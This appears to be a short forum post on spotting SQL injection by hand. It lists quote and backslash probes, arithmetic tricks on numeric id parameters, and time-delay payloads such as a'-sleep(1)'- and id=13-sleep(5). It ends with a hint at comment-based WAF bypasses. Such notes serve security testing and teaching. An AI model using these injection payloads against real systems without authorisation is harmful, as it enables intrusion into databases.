Below, by error it means some error appears or shows some different behaviour
\
// some error or a different behaviour
\\
// no error
'
// error
''
// no error, it is a single quote written twice
'''
// error
''''
// no error
'''''
// error
Odd number of quotes giving error
Even number of quotes not giving error
Above conditions might indicate an SQLi
further test:
a'-sleep(1)'-
// delays response by more than 1 second, observe time delay (sometimes a big delay in response will cause timeout indicating possible SQLi)
a'-sleep(5)-'
// delays response by more than 5 seconds
Confirms SQLi
Similar tests can be done for double quotes "
(parameters might look like numbers)
id=10
// response: A
id=11
// response: B
id=12
// response: C
id=13-1
// response: C
id=13-2
// response: B
id=13-3
// response: A
id=5*2
// response: A (5*2=10)
Above conditions might indicate an SQLi, or might indicate that our input is being interpreted somehow
id=13-sleep(1)
// delay of more than 1 second in response
id=13-sleep(5)
// delay of more than 5 seconds
SQLi Confirmed
One might try sleep/**/(1)
OR relevant WAF bypassing paylaods if WAF is present
Comment if you have other detection ways, I might have missed some. (I'll update if I missed something)